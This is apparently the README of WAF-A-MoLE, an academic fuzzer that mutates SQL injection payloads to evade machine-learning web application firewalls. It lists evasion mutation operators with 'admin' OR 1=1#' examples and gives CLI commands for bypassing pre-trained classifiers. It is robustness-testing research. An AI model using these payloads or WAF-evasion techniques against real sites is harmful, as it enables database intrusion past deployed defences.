A guided mutation-based fuzzer for ML-based Web Application Firewalls, inspired by AFL and based on the FuzzingBook by Andreas Zeller et al.

Given an input SQL injection query, it tries to produce a semantically equivalent query that can bypass the target WAF. You can use this tool to assess the robustness of your product by letting WAF-A-MoLE explore the solution space to find dangerous "blind spots" left uncovered by the target classifier.



WAF-A-MoLE takes an initial payload and inserts it in the payload Pool, which manages a priority queue ordered by the WAF confidence score over each payload.

During each iteration, the head of the payload Pool is passed to the Fuzzer, where it is randomly mutated by applying one of the available mutation operators.
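The Pool-and-Fuzzer loop described above can be sketched roughly as follows. This is a minimal illustration, not WAF-A-MoLE's actual implementation: `guided_search`, `toy_classify`, and `toy_mutate` are hypothetical names, and the toy scorer only stands in for a real WAF so that the example runs on its own.

```python
import heapq
import itertools
import random


def toy_classify(payload):
    """Hypothetical WAF stand-in: confidence drops as plain spaces are replaced."""
    whitespace = [c for c in payload if c.isspace()]
    if not whitespace:
        return 0.0
    return 0.9 * whitespace.count(" ") / len(whitespace)


def toy_mutate(payload, rng):
    """Hypothetical mutation: turn one randomly chosen space into a tab."""
    spaces = [i for i, c in enumerate(payload) if c == " "]
    if not spaces:
        return payload
    i = rng.choice(spaces)
    return payload[:i] + "\t" + payload[i + 1:]


def guided_search(payload, classify, mutate, threshold=0.5,
                  max_rounds=100, round_size=5, seed=0):
    """Return (confidence, payload) for the lowest-scoring payload found."""
    rng = random.Random(seed)
    tie = itertools.count()  # tie-breaker so the heap never compares payloads
    best_score, best_payload = classify(payload), payload
    pool = [(best_score, next(tie), payload)]  # min-heap keyed on confidence
    for _ in range(max_rounds):
        if best_score < threshold or not pool:
            break
        # The head of the pool is the payload the classifier is least sure about.
        _score, _order, candidate = heapq.heappop(pool)
        for _step in range(round_size):
            mutated = mutate(candidate, rng)
            score = classify(mutated)
            heapq.heappush(pool, (score, next(tie), mutated))
            if score < best_score:
                best_score, best_payload = score, mutated
    return best_score, best_payload


score, evasive = guided_search("admin' OR 1=1#", toy_classify, toy_mutate)
print(score, repr(evasive))
```

Ordering the pool by confidence means each round spends its mutations on the most promising candidate seen so far, which is what makes the search guided rather than purely random.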

Mutation operators are all semantics-preserving and leverage the high expressive power of the SQL language (in this version, MySQL).

Below are the mutation operators available in the current version of WAF-A-MoLE.

| Mutation | Example |
|---|---|
| Case Swapping | `admin' OR 1=1#` ⇒ `admin' oR 1=1#` |
| Whitespace Substitution | `admin' OR 1=1#` ⇒ `admin'\t\rOR\n1=1#` |
| Comment Injection | `admin' OR 1=1#` ⇒ `admin'/**/OR 1=1#` |
| Comment Rewriting | `admin'/**/OR 1=1#` ⇒ `admin'/*xyz*/OR 1=1#abc` |
| Integer Encoding | `admin' OR 1=1#` ⇒ `admin' OR 0x1=(SELECT 1)#` |
| Operator Swapping | `admin' OR 1=1#` ⇒ `admin' OR 1 LIKE 1#` |
| Logical Invariant | `admin' OR 1=1#` ⇒ `admin' OR 1=1 AND 0<1#` |
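To make the table more concrete, here is a rough sketch of three of these operators (case swapping, whitespace substitution, comment injection). The function names and the keyword list are assumptions made for illustration and are not taken from the WAF-A-MoLE code base. The sketch works on raw text, so spaces inside string literals would also be rewritten; a faithful implementation would need to be aware of SQL syntax.

```python
import random
import re

# Illustrative keyword list (an assumption); real SQL has many more keywords.
KEYWORDS = re.compile(r"\b(?:select|union|where|from|like|and|or)\b", re.IGNORECASE)


def swap_case(payload, rng):
    """Randomly flip the case of each letter in SQL keywords."""
    def flip(match):
        return "".join(rng.choice((c.lower(), c.upper())) for c in match.group(0))
    return KEYWORDS.sub(flip, payload)


def substitute_whitespace(payload, rng):
    """Replace each space with a randomly chosen whitespace character."""
    return "".join(rng.choice(" \t\n\r") if c == " " else c for c in payload)


def inject_comment(payload, rng):
    """Replace one randomly chosen space with an empty inline comment."""
    spaces = [i for i, c in enumerate(payload) if c == " "]
    if not spaces:
        return payload
    i = rng.choice(spaces)
    return payload[:i] + "/**/" + payload[i + 1:]


OPERATORS = (swap_case, substitute_whitespace, inject_comment)


def mutate(payload, rng):
    """Apply one randomly selected operator, as the Fuzzer does at each step."""
    return rng.choice(OPERATORS)(payload, rng)


rng = random.Random(0)
print(repr(mutate("admin' OR 1=1#", rng)))
```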

```bash
pip install -r requirements.txt
```

You can evaluate the robustness of your own WAF, or try WAF-A-MoLE against some example classifiers. In the first case, have a look at the Model class. Your custom model needs to implement this class in order to be evaluated by WAF-A-MoLE. We already provide wrappers for scikit-learn and Keras classifiers that can be extended to fit your feature extraction phase (if any).

```bash
wafamole --help
Usage: wafamole [OPTIONS] COMMAND [ARGS]...

Options:
  --help  Show this message and exit.

Commands:
  evade  Launch WAF-A-MoLE against a target classifier.
```

```bash
wafamole evade --help
Usage: wafamole evade [OPTIONS] MODEL_PATH PAYLOAD

  Launch WAF-A-MoLE against a target classifier.

Options:
  -T, --model-type TEXT     Type of classifier to load
  -t, --timeout INTEGER     Timeout when evading the model
  -r, --max-rounds INTEGER  Maximum number of fuzzing rounds
  -s, --round-size INTEGER  Fuzzing step size for each round (parallel fuzzing
                            steps)
  --threshold FLOAT         Classification threshold of the target WAF [0.5]
  --random-engine TEXT      Use random transformations instead of evolution
                            engine. Set the number of trials
  --output-path TEXT        Location were to save the results of the random
                            engine. NOT USED WITH REGULAR EVOLUTION ENGINE
  --help                    Show this message and exit.
```

We provide some pre-trained models you can have fun with, located in wafamole/models/custom/example_models. The classifiers we used are listed in the table below.

| Classifier name | Algorithm |
|---|---|
| WafBrain | Recurrent Neural Network |
| Token-based | Naive Bayes |
| Token-based | Random Forest |
| Token-based | Linear SVM |
| Token-based | Gaussian SVM |
| SQLiGoT - Directed Proportional | Gaussian SVM |
| SQLiGoT - Directed Unproportional | Gaussian SVM |
| SQLiGoT - Undirected Proportional | Gaussian SVM |
| SQLiGoT - Undirected Unproportional | Gaussian SVM |

Bypass the pre-trained WAF-Brain classifier using an `admin' OR 1=1#` equivalent.

```bash
wafamole evade --model-type waf-brain wafamole/models/custom/example_models/waf-brain.h5 "admin' OR 1=1#"
```

Bypass the pre-trained token-based Naive Bayes classifier using an `admin' OR 1=1#` equivalent.

```bash
wafamole evade --model-type token wafamole/models/custom/example_models/naive_bayes_trained.dump "admin' OR 1=1#"
```

Bypass the pre-trained token-based Random Forest classifier using an `admin' OR 1=1#` equivalent.

```bash
wafamole evade --model-type token wafamole/models/custom/example_models/random_forest_trained.dump "admin' OR 1=1#"
```

Bypass the pre-trained token-based Linear SVM classifier using an `admin' OR 1=1#` equivalent.

```bash
wafamole evade --model-type token wafamole/models/custom/example_models/lin_svm_trained.dump "admin' OR 1=1#"
```

Bypass the pre-trained token-based Gaussian SVM classifier using an `admin' OR 1=1#` equivalent.

```bash
wafamole evade --model-type token wafamole/models/custom/example_models/gauss_svm_trained.dump "admin' OR 1=1#"
```

Bypass the pre-trained SQLiGoT classifier using an `admin' OR 1=1#` equivalent.

Use DP, UP, DU, or UU for (respectively) Directed Proportional, Undirected Proportional, Directed Unproportional and Undirected Unproportional.

```bash
wafamole evade --model-type DP wafamole/models/custom/example_models/graph_directed_proportional_sqligot "admin' OR 1=1#"
```

BEFORE LAUNCHING EVALUATION ON SQLiGoT

These classifiers are more robust than the others, as the feature extraction phase produces vectors with a more complex structure, and all pre-trained classifiers have been strongly regularized. It may take hours for some variants to produce a payload that achieves evasion (see Benchmark section).

First, create a custom Model class that implements the extract_features and classify methods.

```python
from wafamole.models import Model  # import path assumed from the package layout


class YourCustomModel(Model):
    def extract_features(self, value: str):
        # TODO: extract features
        feature_vector = your_custom_feature_function(value)
        return feature_vector

    def classify(self, value):
        # TODO: compute confidence
        confidence = your_confidence_eval(value)
        return confidence
```

Then, create an object from the model and instantiate an engine object that uses your model class.

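```python
from wafamole.evasion import EvasionEngine  # import path assumed from the package layout

model = YourCustomModel()  # your init
engine = EvasionEngine(model)
result = engine.evaluate(payload, max_rounds, round_size, timeout, threshold)
```

We evaluated WAF-A-MoLE against all our example models.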



The plot shows the time it took for WAF-A-MoLE to mutate the `admin' OR 1=1#` payload until each classifier accepted it as benign.

The x axis shows time (in seconds, logarithmic scale). The y axis shows the confidence value, i.e., how sure a classifier is that a given payload is a SQL injection (as a percentage).

Notice that being "50% sure" that a payload is a SQL injection is equivalent to flipping a coin. This is the usual classification threshold: if the confidence is lower, the payload is classified as benign.
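As a small illustration of this decision rule, the sketch below maps a confidence score to a verdict. The function name `verdict` is hypothetical, and treating a confidence exactly equal to the threshold as malicious is an assumption; the text above only states what happens when the confidence is lower.

```python
def verdict(confidence, threshold=0.5):
    """Map a confidence in [0, 1] to the classifier's decision."""
    # Assumption: a score exactly at the threshold counts as an injection.
    return "benign" if confidence < threshold else "sqli"


print(verdict(0.49), verdict(0.51))
```

Raising the threshold makes the target more permissive, so fewer mutations are needed before a payload counts as evasive; lowering it has the opposite effect.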

Experiments were performed on DigitalOcean Standard Droplets.

Questions, bug reports and pull requests are welcome.

In particular, if you are interested in expanding this project, we are looking for the following contributions:

- New WAF adapters

- New mutation operators

- New search algorithms

Team:

- Luca Demetrio - CSecLab, DIBRIS, University of Genova

- Andrea Valenza - CSecLab, DIBRIS, University of Genova

- Gabriele Costa - SysMA, IMT Lucca

- Giovanni Lagorio - CSecLab, DIBRIS, University of Genova